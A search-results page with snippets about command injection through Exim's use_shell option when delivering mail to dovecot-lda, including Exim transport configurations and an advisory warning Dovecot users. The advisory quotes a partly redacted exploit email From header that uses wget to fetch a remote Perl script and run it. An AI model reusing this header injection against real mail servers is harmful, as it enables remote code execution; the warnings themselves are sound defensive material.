search for: use_shel

...email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell"...

...ng Dovecot 2.1.7 on Debian. Exim is the MTA. I was recently made aware of the fact that the way in which Exim invokes dovecot-lda is prone to code injection: dovecot_virtual_delivery: driver = pipe command = HOME=/home/vmail/\$local_part /usr/lib/dovecot/dovecot-lda -f \$sender_address use_shell .. I.e. a command is executed via the shell, and Exim uses non-sanitized user input (mail header fields) to construct the command. Now, the reason I invoked dovecot like that is to pass a plausible value for the HOME environment variable, so that dovecot-lda can determine where the Maildir...

...known account $local_part@$domain exim transport: dovecot_delivery: driver = pipe command = /usr/local/libexec/dovecot/dovecot-lda -e -k -d $local_part@$domain \ -f $sender_address -a $original_local_part@$original_domain -m INBOX #use_shell user = mailnull message_prefix = "" message_suffix = "" return_path_add = true envelope_to_add = true delivery_date_add = true temp_errors = 64 : 69 : 70: 71 : 72 : 73 : 74 : 75 : 78 log_output And my pr...